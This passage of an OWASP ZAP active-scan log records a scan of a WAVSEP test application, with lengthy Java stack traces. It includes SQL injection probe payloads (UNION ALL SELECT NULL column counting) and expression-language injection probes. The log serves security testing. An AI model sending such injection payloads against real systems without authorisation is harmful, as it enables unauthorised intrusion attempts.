org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688543 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688545 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688546 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688548 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688551 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688552 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688552 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9689018 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9689157 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9689537 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 9689537 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 9689543 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 9689999 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 9690001 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 9690216 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9690296 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9690761 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9690815 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9691157 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9691343 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9692083 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9692167 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9692895 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9692949 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9693491 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9693531 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9694799 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9694900 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9695436 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9695503 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9696055 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9696107 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9696667 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9696683 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9697187 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9697803 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9697886 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9698656 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9698721 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9699290 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9699351 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9699890 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9699914 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9700961 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9700993 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9701652 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9701664 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9702228 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9702275 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9702752 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9703763 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SQLInjectionPlugin in 1113.72s 9703764 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | XpathInjectionPlugin strength LOW threshold MEDIUM 9808898 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 9808898 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 9808903 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 9809783 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 9809785 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 9852621 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | XpathInjectionPlugin in 148.857s 9852621 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | XXEPlugin strength LOW threshold MEDIUM 9853720 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | XXEPlugin in 1.099s 9853720 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | PaddingOraclePlugin strength LOW threshold MEDIUM 9966082 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | PaddingOraclePlugin in 112.362s 9966082 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | ExpressionLanguageInjectionPlugin strength LOW threshold MEDIUM 10057871 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${703058+996006}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/${703058+996006} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10071341 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${848136+932507}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/${848136+932507} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10104812 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${122578+339547}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${122578+339547} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105011 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${142082+488040}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${142082+488040} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 